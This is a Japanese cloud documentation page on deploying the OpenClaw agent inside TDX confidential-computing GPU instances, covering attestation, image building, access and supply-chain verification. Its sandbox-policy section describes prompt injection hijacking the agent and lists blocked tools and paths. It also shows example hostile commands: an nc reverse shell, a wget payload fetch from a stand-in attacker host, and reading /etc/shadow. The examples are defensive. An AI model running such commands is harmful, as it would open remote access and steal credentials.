すべてのプロダクト
Search
ドキュメントセンター

Elastic GPU Service:ヘテロジニアスコンフィデンシャルコンピューティングインスタンスにおける OpenClaw コンフィデンシャル AI エージェントの構築

最終更新日:Jun 22, 2026

AI エージェントは、実行時にユーザーとの会話を処理し、外部ツールを呼び出し、長期メモリやサービス認証情報を管理するため、従来のアプリケーションをはるかに超える攻撃対象領域を持ちます。Alibaba Cloud の gn8v-tee ヘテロジニアスコンフィデンシャルコンピューティングインスタンスは、Intel TDX と NVIDIA GPU のコンフィデンシャルコンピューティング機能を活用し、完全な高信頼実行環境 (TEE) を提供します。これらのインスタンス上にオープンソース AI エージェントフレームワーク OpenClaw をデプロイすることで、ハードウェアレベルのデータ保護、リモートアテステーション、サプライチェーンの検証可能性を実現し、モデル推論とユーザーインタラクションのエンドツーエンドのセキュリティを確保できます。

概要

本トピックでは、Intel TDX (Trust Domain Extensions) をサポートする gn8v-tee インスタンスに OpenClaw をデプロイする Confidential Agent ソリューションについて説明します。Qwen3.6-35B-A3B Mixture of Experts (MoE) モデルはインスタンス上でローカルに実行されるため、エージェントの実行とモデル推論は TDX トラストドメイン内で完全に完結します。ユーザー入力、モデルの重み、推論の中間状態、AI の出力は、処理中にコンフィデンシャルインスタンスの信頼境界から外部に出ることはありません。

説明

gn8v-tee は、Alibaba Cloud がリリースした GPU ベースのコンフィデンシャルコンピューティングインスタンスファミリーです。Intel TDX ハードウェア暗号化と NVIDIA GPU アクセラレーションを統合し、AI 推論のパフォーマンスとデータセキュリティコンプライアンスの要件の両方を満たします。本トピックでは、cn-beijing-l ゾーンで Alibaba Cloud Linux 3 を実行する ecs.gn8v-tee.4xlarge を例として使用します。より大規模なワークロードの場合は、マルチ GPU インスタンスタイプにスケールアウトできます。

セキュリティアーキテクチャ

Confidential Agent デプロイにおけるすべてのコアデータは、TEE 境界内で循環します。次の 3 種類の資産は厳重に保護されます。

保護される資産

説明

ユーザー会話のプライバシー

ユーザー入力、ツール実行コンテキスト、AI 応答。これらには、個人を特定できる情報 (PII)、医療記録、財務データなどの機密情報が含まれる可能性があります。

エージェントのメモリと状態

OpenClaw の長期メモリ、設定、SKILL ファイル。これらは時間の経過とともに蓄積され、高価値のターゲットとなります。

サービス認証情報

DingTalk などの IM プラットフォームの OAuth 認証情報、外部 API キー、ゲートウェイトークン。

セキュリティアーキテクチャは、下から上へハードウェア、ブートチェーン、ランタイム、キー管理、通信の 5 つの層をカバーします。

保護層

メカニズム

ハードウェア

Intel TDX Memory Encryption Engine (MEE) は、すべてのゲストメモリを透過的に暗号化します。クラウドプロバイダーは平文を読み取ることができません。

ブートチェーン

Unified Kernel Image (UKI) + dm-verity rootfs による改ざん保護。リモートアテステーションによりランタイムの完全性を検証します。サプライチェーンの参照値は Rekor 透明性ログに記録されます。

ランタイム

PEP ポリシーサンドボックスは、高リスクコマンドと機密パスへのアクセスをブロックし、プロンプトインジェクションによる権限昇格を防ぎます。

キー管理

ディスク暗号化キーは、ブート時にリモートアテステーションチャレンジを通じて注入され、ユーザーがローカルで保持します。クラウドプロバイダーは関与しません。

通信

RATS-TLS エンドツーエンド暗号化。暗号化チャネルは、リモートアテステーションがインスタンス ID を検証した後にのみ確立されます。すべての通信は転送時に暗号化されます。

デプロイワークフロー

image
  1. ソースコード監査:デプロイヤーは、ビジネスソースコードを監査し、悪意のあるコードやバックドアが存在しないことを確認します。

  2. アーティファクトのビルドとソフトウェア参照値の公開:監査済みソースコードから OpenClaw サービスのみを含む軽量 OS イメージをビルドし、ビルドアーティファクトの SLSA 署名を Rekor 透明性ログにアップロードして、ソフトウェア参照値を公開します。

  3. コンフィデンシャルインスタンスの作成:ビルドしたイメージを使用して、gn8v-tee コンフィデンシャルコンピューティングインスタンスを作成します。

  4. リモートアテステーション監査とコンフィデンシャルリソースのアップロード:デプロイヤーは、デプロイツールを使用してインスタンスに対してリモートアテステーションを実行し、正規の TDX ハードウェア上で実行されていることを検証します。検証後、ディスク暗号化キーや DingTalk Bot 認証情報などのコンフィデンシャルリソースが自動的にアップロードされます。

  5. OpenClaw へのアクセス:ユーザーは、Web ブラウザ、デスクトップクライアント、TUI ターミナルを通じて直接 OpenClaw にアクセスするか、DingTalk などの IM プラットフォームを通じて間接的にアクセスできます。

  6. リモートアテステーション監査と暗号化転送:接続を確立する前に、トラステッドゲートウェイクライアントは Rekor からソフトウェア参照値を、Intel PCCS と RIM/OCSP からハードウェア参照値を取得します。リモートアテステーション検証が完了した後、RATS-TLS 暗号化チャネルが確立されます。すべての通信はエンドツーエンドで暗号化されます。

前提条件

  • Alibaba Cloud ECS がアクティベート済みであり、アカウントに gn8v-tee インスタンスを作成する権限があること。

  • デプロイマシンとして、Alibaba Cloud Linux 3 を実行する ECS インスタンス (汎用またはその他のタイプ) が準備されており、少なくとも 80 GB の空きディスク容量があること。

    重要

    デプロイマシンはデプロイ操作にのみ使用されます。汎用インスタンスで十分です。gn8v-tee インスタンスを使用する必要はありません。後続の手順で、デプロイマシン上でコマンドを実行して gn8v-tee インスタンスを作成します。

  • Alibaba Cloud AccessKey ペアを取得していること。RAM ロールまたは STS 一時認証情報の使用を推奨します。

  • DingTalk 統合を使用する必要がある場合は、DingTalk 社内エンタープライズアプリケーションを作成し、必要な認証情報を取得済みであること。

操作手順

ステップ 1:OpenClaw と vLLM 推論エンジンを含むトラステッドイメージのビルド

デプロイマシン (Alibaba Cloud Linux 3 インスタンス) で次のタスクを完了します:ソースコードのダウンロード、依存関係のインストール、キーの生成、クラウドリソースの設定、トラステッドイメージのビルド。

  1. ECS インスタンスにログインします。

    1. ECS コンソール - インスタンスに移動し、上部ナビゲーションバーで対象のリージョンとリソースグループを選択します。

    2. 対象インスタンスの詳細ページに移動し、[Connect] をクリックして、[Workbench] を選択します。 接続方法を [Terminal] に設定し、ユーザー名とパスワードを入力して、グラフィカルターミナルページにログインします。

  2. プロジェクトのソースコードをダウンロードします。

    cd ~/
    git clone https://github.com/inclavare-containers/confidential-agent
    cd confidential-agent
  3. 必要なすべてのソフトウェア依存関係をインストールします。

    make install-deps

    このコマンドは、Docker、Terraform、Go、Python、cosign、rekor-cli など、ビルドとデプロイに必要なツールを自動的にインストールします。

  4. デプロイに必要な暗号化キーと設定ファイルを生成します。

    make generate-secrets

    キーが生成されたら、secrets/openclaw-vllm.json を編集し、プレースホルダーを DingTalk アプリケーションの認証情報やモデル設定などの実際の値に置き換えます。 次の表で、プレースホルダーについて説明します。

    プレースホルダー

    説明

    取得方法

    <DINGTALK_BOT_CLIENT_ID>

    DingTalk Bot ClientId

    詳細については、「DingTalk Bot + OpenClaw」をご参照ください。DingTalk 開発者ポータル でアプリケーションを作成して値を取得します。

    <DINGTALK_BOT_CLIENT_SECRET>

    DingTalk Bot ClientSecret

    上記と同様です。アプリケーションの詳細ページから値を取得します。

  5. Terraform 変数ファイルを設定します。

    説明

    Terraform は、オープンソースのコードとしてのインフラストラクチャ (IaC) ツールであり、宣言型設定ファイルを記述することで、Alibaba Cloud 上のさまざまなクラウドリソースとサービスの作成、変更、バージョン管理を自動化できます。このソリューションでは、Terraform を使用してコンフィデンシャルインスタンスのデプロイを自動化します。

    cp terraform/terraform.tfvars.example terraform/terraform.tfvars

    terraform/terraform.tfvars ファイルを編集し、次の表に従ってキーパラメーターを設定します。

    パラメーター

    推奨値

    説明

    zone_id

    "cn-beijing-l"

    gn8v-tee インスタンスファミリーをサポートするゾーン

    vpc_cidr

    "10.0.0.0/16"

    VPC CIDR ブロック

    vswitch_cidr

    "10.0.1.0/24"

    vSwitch CIDR ブロック

    security_group_allowed_cidr

    OpenClaw サービスにアクセスする必要があるクライアント環境の IP CIDR ブロック

    セキュリティグループで許可されるソース IP 範囲

    重要

    security_group_allowed_cidr のデフォルト値は 0.0.0.0/0 です。本番環境では、この値を特定の IP CIDR ブロックに変更し、必要な送信元 IP アドレスのみを許可する必要があります。

  6. Terraform がクラウドリソースを作成できるように、Alibaba Cloud アクセス認証情報をエクスポートします。

    export ALICLOUD_ACCESS_KEY="<YOUR_ACCESS_KEY>"
    export ALICLOUD_SECRET_KEY="<YOUR_SECRET_KEY>"
    説明

    AccessKey ペアの長期保存を避けるため、RAM ロールまたは一時認証情報 (STS) の使用を推奨します。AccessKey ペアの作成方法については、「AccessKey ペアの作成」をご参照ください。

  7. OpenClaw と vLLM 推論エンジンを含むトラステッドイメージをビルドします。

    make build PROFILE=openclaw-vllm
    説明

    初回ビルドには GPU ドライバーのインストールなどの手順が含まれるため、完了までに時間がかかる場合があります。

    ビルドが完了すると、次の 2 つのイメージが生成されます:

    イメージタイプ

    説明

    本番イメージ

    SSH サーバーが削除され、最小限のランタイムのみが保持されたセキュリティ強化版。本番デプロイ用

    デバッグイメージ

    SSH アクセスとデバッグツールを保持。トラブルシューティング専用

    ビルドプロセス中に、イメージ参照値も Rekor 透明性ログにアップロードされます。デプロイ時の検証用に、.rekor-meta.json メタデータファイルが生成されます。

ステップ 2:トラステッドイメージのインスタンスへのデプロイ

トラステッドイメージを gn8v-tee インスタンスにデプロイし、TNG を通じてエンドツーエンドの暗号化チャネルを確立します。

  1. デプロイマシンで次のコマンドを実行して、トラステッドイメージを使用して gn8v-tee インスタンスを作成します。インスタンスが作成された後、インスタンスに対してリモートアテステーションが実行され、コンフィデンシャルリソースがアップロードされます。

    make deploy PROFILE=openclaw-vllm RV_MODE=rekor

    次の表に主要なパラメーターを示します:

    パラメーター

    説明

    PROFILE=openclaw-vllm

    デプロイプロファイルを指定します

    RV_MODE=rekor

    デプロイ時に Rekor 透明性ログを通じてイメージ参照値の完全性を検証します

    デプロイプロセスでは、クラウドに次のリソースが作成されます:

    • OSS バケット:トラステッド VM イメージ (.qcow2) をアップロードおよびホストするために使用されるプライベートなストレージ領域。

    • ECS カスタムイメージ:OSS イメージファイルから Alibaba Cloud ECS カスタムイメージライブラリにインポートされます。

    • ECS GPU コンフィデンシャルコンピューティングインスタンス:セキュリティグループと vSwitch にアタッチされた ecs.gn8v-tee.4xlarge コンフィデンシャルコンピューティングインスタンス。UKI ブートパラメーターにはリモートアテステーションチャレンジ設定が含まれます。

    • セキュリティグループ:SSH (ポート 22) と TNG (ポート 18789) を開き、指定された CIDR ブロックからのアクセスのみを許可します。

    説明

    デフォルトでは、デバッグイメージがデプロイされます。本番イメージ (SSH アクセスなし) をデプロイするには、イメージファイルを手動で指定する必要があります。

    重要

    デプロイ中、イメージが OSS にアップロードされ、モデルが ModelScope からダウンロードされるため、インターネットアクセスが必要であり、トラフィック料金が発生します。

  2. デプロイマシンで TNG クライアントを起動して、デプロイマシンとクラウドベースの gn8v-tee インスタンス間に RATS-TLS 暗号化チャネルを確立します。

    make connect-tng

    接続が成功すると、出力に HTTP および WebSocket URL と、OpenClaw にアクセスするために必要なアクセストークンが含まれます。以降のすべての通信は RATS-TLS 暗号化によって保護されます。

  3. TNG トンネルを通じて OpenClaw サービスの準備が完了したかを確認します。

    curl -s http://localhost:18789/health

    正常なステータスが返されたら、サービスにアクセスできるようになります。

ステップ 3:コンフィデンシャルコンピューティングで保護された OpenClaw サービスへのアクセス

サービスの準備ができたら、次の 4 つの方法で OpenClaw サービスにアクセスできます:

方法 1:DingTalk チャットによるアクセス

DingTalk で設定した Bot を見つけて、メッセージを送信して OpenClaw との会話を開始します。

image

方法 2:ブラウザベースの Web UI によるアクセス

準備:ローカルマシンからデプロイマシンへのポートフォワーディングの確立

ステップ 2 の make connect-tng コマンドは、デプロイマシンで実行され、TNG トンネルをデプロイマシンの localhost:18789 にバインドします。ローカルマシンからデプロイマシンへの SSH ポートフォワーディングを設定する必要があります:

ssh -L 18789:127.0.0.1:18789 root@<デプロイマシンのIP>

ポートフォワーディングが確立されると、ローカルマシンのブラウザーまたはクライアントからの localhost:18789 へのアクセスは、デプロイマシンの TNG トンネルへのアクセスと同等です。

ブラウザによるアクセス

ローカルマシンで SSH ポートフォワーディングを設定した後、ブラウザで http://localhost:18789/openclaw にアクセスして Web コントロールパネルを開きます。ステップ 2 で取得した OpenClaw トークンを入力して、サービスにアクセスします。

image

方法 3:OpenClaw デスクトップクライアントによるアクセス

準備:ローカルマシンからデプロイマシンへのポートフォワーディングの確立

ステップ 2 の make connect-tng コマンドは、デプロイマシンで実行され、TNG トンネルをデプロイマシンの localhost:18789 にバインドします。ローカルマシンからデプロイマシンへの SSH ポートフォワーディングを設定する必要があります:

ssh -L 18789:127.0.0.1:18789 root@<デプロイマシンのIP>

ポートフォワーディングが確立されると、ローカルマシンのブラウザーまたはクライアントからの localhost:18789 へのアクセスは、デプロイマシンの TNG トンネルへのアクセスと同等です。

デスクトップクライアントによるアクセス

ローカルマシンに OpenClaw デスクトップクライアントをインストールし、リモートモードを設定し、接続アドレスを ws://localhost:18789 に設定し、ステップ 2 で取得した OpenClaw トークンを入力します。

方法 4:OpenClaw TUI によるアクセス

デプロイマシンにクライアントとして OpenClaw をインストールします。

npm install -g openclaw@latest --registry=https://registry.npmmirror.com

次に、デプロイマシンで次のコマンドを実行して OpenClaw TUI を起動し、リモート OpenClaw インスタンスに接続します。

openclaw tui --url ws://localhost:18789 --token <gateway-token>

<gateway-token> をステップ 2 で取得した OpenClaw ゲートウェイトークンに置き換えます。

説明

TUI で初めて接続すると、pairing required というメッセージが表示されます。ブラウザーで http://localhost:18789/openclaw にアクセスし、[ノード] ページで承認待ちのデバイスを見つけ、[承認] をクリックして承認を完了します。その後、TUI に戻ります。

承認が完了すると、TUI で会話の準備が整います。

image

ステップ 4 (オプション):リソースの解放

サービスが不要になったら、次のコマンドを実行してすべてのクラウドリソースを解放します:

make destroy PROFILE=openclaw-vllm
警告

この操作は元に戻すことができず、ECS インスタンスと関連するネットワークリソースが削除されます。このコマンドを実行する前に、インスタンス上のデータが不要であることを確認してください。

セキュリティ検証

ランタイム環境の信頼性の検証

OpenClaw には、セキュリティ関連の質問が行われるとリモートアテステーションを自動的にトリガーし、現在のランタイム環境のセキュリティステータスを検証する、組み込みの tdx-remote-attestation スキルがあります。

トリガー方法:DingTalk、Web、TUI でセキュリティ関連の質問 (「私のデータは安全ですか?」や「この環境は信頼できますか?」など) をしてください。

返される内容

検証項目

説明

ハードウェア信頼ステータス

ハードウェア値が 32 以下の場合、検証に合格したことを示します

TEE タイプ

Intel TDX トラストドメイン

メモリ暗号化保護

Memory Encryption Engine が有効になっていることを確認します

UKI ブートチェーンの完全性

コンポーネント測定値の一貫性を検証します

image (1)

PEP ポリシー適用の検証

PEP (ポリシー強制ポイント) は、機密 AI エージェント向けに設計されたランタイムゲーティングメカニズムです。OpenClaw などのエージェントが exec ツールを介してコマンドを実行すると、リクエストはまずポリシーマッチングのために cai-pep を通過し、その後、分離された Docker サンドボックス (ネットワークモード none) で実行されます。設定可能なポリシーは、エージェントが利用できるツールに必須の制限を適用することで、悪意のあるプロンプトインジェクションに起因するセキュリティリスクを防ぎます。

PEP は 3 つの層の保護を提供します。

  1. コマンドレベルのブロッキング: ブロックリストに基づいて、curlwgetncsshdocker などのリスクの高いコマンドを拒否します。

  2. パスレベルブロッキング/etc/proc/root/home/openclaw/.openclaw のような機密性の高いパスへのアクセスを防止します。

  3. ネットワーク分離:サンドボックスにはネットワークアクセスがありません。コマンドがブロックリストをバイパスしても、アウトバウンド接続を確立できません。

デフォルトのポリシーファイルは、デプロイマシン上の ~/confidential-agent/image/customize/files/cai-pep-default-policy.json にあります。イメージをビルドする前に、コマンドブロックリスト、パスブロックリスト、およびリソース制限を変更できます。

エージェントが悪意のあるプロンプトインジェクションによって侵害され、攻撃者がリバースシェルを確立したり、悪意のあるペイロードをダウンロードしようとしたりする場合、PEP はこれらの高リスク操作を自動的にブロックします。

攻撃方法

コマンド例

ブロックの理由

リバースシェル

nc 10.0.0.99 4444 -e /bin/bash

nc はコマンドブロックリストに含まれています

悪意のあるペイロードのダウンロード

wget http://evil.example.com/payload.sh

wget はコマンドブロックリストに含まれています

機密ファイルの読み取り

cat /etc/shadow

/etc/shadow はパスプレフィックス /etc と一致します

サプライチェーンの完全性の検証

デプロイプロセスでは、デフォルトで Rekor 透明性ログを使用してイメージ参照値を保存します。リモートアテステーション中、参照値は Rekor から自動的に取得されて検証されます。次の方法を使用して Rekor ログエントリを監査し、サプライチェーンの完全性を検証できます。

Rekor レコードの表示

ビルドが完了したら、デプロイマシンでレコードのログインデックスとエントリ URL を確認できます。

cat ~/confidential-agent/image/output/slsa-output-cai-openclaw-vllm-debug-*/rekor-v1-upload.txt

出力例:

Created entry at index 1205944956, available at: https://rekor.sigstore.dev/api/v1/log/entries/<uuid>

インクルージョンプルーフの検証

インクルージョンプルーフは、イメージ参照値を含むエントリが Rekor ログの Merkle Root に存在することを確認します。

rekor-cli verify --log-index 1205944956 --rekor_server https://rekor.sigstore.dev

出力に 2 つの同一のハッシュ値が含まれている場合、検証は成功です。

Computed Root Hash: 1291abcee27148a4c00241ba8719f798ce060e8a5ccc8b18249017c25c6d0090
Expected Root Hash: 1291abcee27148a4c00241ba8719f798ce060e8a5ccc8b18249017c25c6d0090

コンシステンシープルーフの検証

コンシステンシープルーフは、古い Merkle Root (Root A) が新しい Merkle Root (Root B) のプレフィックスまたは履歴状態であることを確認し、Rekor に保存された参照値エントリが改ざんまたは削除されていないことを保証します。

rekor-cli loginfo --rekor_server https://rekor.sigstore.dev

出力に次の内容が含まれている場合、検証は成功です。

Verification Successful!

セキュリティグループの設定

make deploy プロセス中に、セキュリティグループルールが自動的に作成されます。後でセキュリティグループを変更する必要がある場合は、セキュリティグループに以下のルールが含まれていることを確認してください。

ポート

プロトコル

説明

セキュリティ推奨事項

22

TCP

SSH リモート管理 (デバッグイメージのみ)

ソース IP を管理ネットワークに制限します

18789

TCP

TNG トンネルエンドポイント (RATS-TLS)。OpenClaw サービスへのアクセスに使用されます

ソース IP を制限するか、TNG を通じてアクセスします

重要: 本番環境では、必ず security_group_allowed_cidr を特定の管理 IP CIDR ブロックに変更し、0.0.0.0/0 を使用しないでください。

よくある質問

  • make build が依存関係不足エラーで失敗する場合

    すべての依存関係がインストールされていることを確認し、ディスク容量が十分かどうかを確認します。

    make install-deps
    df -h /

    これで問題が解決しない場合は、make clean-image を実行してビルドアクティファクトをクリーンアップし、再試行してください。

  • make deployNoSetRoletoECSServiceAccount で失敗する場合

    このエラーは、ECS イメージインポートロールが承認されていないことを示しています。次のいずれかの操作を実行してください:

    • Alibaba Cloud コンソールにログオンし、[ECS] > [イメージ] > [イメージのインポート] に移動して [承認] をクリックし、AliyunECSImageImportDefaultRole ロールを作成します。

    • RAM コンソールで、AliyunOSSFullAccess ポリシーを AliyunECSImageImportDefaultRole ロールに付与します。

  • サービスが応答しない場合

    1. デバッグイメージがデプロイされていることを確認します (本番イメージには SSH が含まれていません)。

    2. 再デプロイし、make deploy が正常に完了することを確認してください。

    3. デバッグイメージをデプロイし、SSH 経由で接続してログを確認し、トラブルシューティングを行います。

  • ローカル TNG 検証が失敗する場合

    ローカル Trustee コンテナが実行中で正常であることを確認します:

    # ローカル Trustee コンテナが実行中であることを確認する
    docker ps | grep cai-local-trustee
    
    # Trustee のヘルスステータスを確認する
    curl http://127.0.0.1:18081/api/health
    
    # Trustee の準備ができていない場合は、再実行する
    make connect-tng
  • cai-pep がすべてのツール呼び出しを拒否する場合

    デバッグイメージをデプロイし、SSH 経由で接続して cai-pep ログを確認し、ブロックの具体的な理由を確認します。